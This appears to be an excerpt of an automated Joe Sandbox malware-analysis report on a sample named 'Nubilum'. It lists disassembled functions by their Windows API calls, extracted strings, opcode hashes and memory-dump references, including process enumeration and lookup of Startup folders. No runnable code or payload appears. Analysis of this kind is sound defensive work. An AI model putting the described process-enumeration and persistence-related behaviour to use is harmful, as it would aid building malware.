                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2012295524-70141382
                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                          • API String ID: 667068680-3953557276
                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                          APIs
                          • GetDC.USER32(00000000), ref: 004121FF
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                          • SelectObject.GDI32(?,?), ref: 00412251
                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                          • SetCursor.USER32(00000000), ref: 004122BC
                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                          • memcpy.MSVCRT ref: 0041234D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                          • String ID:
                          • API String ID: 1700100422-0
                          • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                          • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004111E0
                          • GetWindowRect.USER32(?,?), ref: 004111F6
                          • GetWindowRect.USER32(?,?), ref: 0041120C
                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                          • GetWindowRect.USER32(00000000), ref: 0041124D
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                          • String ID:
                          • API String ID: 552707033-0
                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                          • memcpy.MSVCRT ref: 0040C11B
                          • strchr.MSVCRT ref: 0040C140
                          • strchr.MSVCRT ref: 0040C151
                          • _strlwr.MSVCRT ref: 0040C15F
                          • memset.MSVCRT ref: 0040C17A
                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                          • String ID: 4$h
                          • API String ID: 4066021378-1856150674
                          • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                          • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: %%0.%df
                          • API String ID: 3473751417-763548558
                          • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                          • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                          APIs
                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                          • KillTimer.USER32(?,00000041), ref: 004060D7
                          • KillTimer.USER32(?,00000041), ref: 004060E8
                          • GetTickCount.KERNEL32 ref: 0040610B
                          • GetParent.USER32(?), ref: 00406136
                          • SendMessageW.USER32(00000000), ref: 0040613D
                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                          • String ID: A
                          • API String ID: 2892645895-3554254475
                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                          APIs
                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                          • GetDesktopWindow.USER32 ref: 0040D9FD
                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                          • memset.MSVCRT ref: 0040DA23
                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                          • String ID: caption
                          • API String ID: 973020956-4135340389
                          • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                          • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                          APIs
                          Strings
                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_snwprintf$wcscpy
                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                          • API String ID: 1283228442-2366825230
                          • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                          • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                          APIs
                          • wcschr.MSVCRT ref: 00413972
                          • wcscpy.MSVCRT ref: 00413982
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          • wcscpy.MSVCRT ref: 004139D1
                          • wcscat.MSVCRT ref: 004139DC
                          • memset.MSVCRT ref: 004139B8
                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                          • memset.MSVCRT ref: 00413A00
                          • memcpy.MSVCRT ref: 00413A1B
                          • wcscat.MSVCRT ref: 00413A27
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                          • String ID: \systemroot
                          • API String ID: 4173585201-1821301763
                          • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                          • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscpy
                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                          • API String ID: 1284135714-318151290
                          • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                          • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                          • String ID: 0$6
                          • API String ID: 4066108131-3849865405
                          • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                          • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                          APIs
                          • memset.MSVCRT ref: 004082EF
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memset.MSVCRT ref: 00408362
                          • memset.MSVCRT ref: 00408377
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiWide
                          • String ID:
                          • API String ID: 290601579-0
                          • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                          • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memchrmemset
                          • String ID: PD$PD
                          • API String ID: 1581201632-2312785699
                          • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                          • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                          • GetDC.USER32(00000000), ref: 00409F6E
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                          • GetParent.USER32(?), ref: 00409FA5
                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                          • String ID:
                          • API String ID: 2163313125-0
                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$wcslen
                          • String ID:
                          • API String ID: 239872665-3916222277
                          • Opcode ID: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                          • Opcode Fuzzy Hash: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpywcslen$_snwprintfmemset
                          • String ID: %s (%s)$YV@
                          • API String ID: 3979103747-598926743
                          • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                          • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                          APIs
                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                          • wcslen.MSVCRT ref: 0040A6B1
                          • wcscpy.MSVCRT ref: 0040A6C1
                          • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                          • wcscpy.MSVCRT ref: 0040A6DB
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                          • String ID: Unknown Error$netmsg.dll
                          • API String ID: 2767993716-572158859
                          • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                          • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                          APIs
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 0040DAFB
                          • wcscpy.MSVCRT ref: 0040DB0B
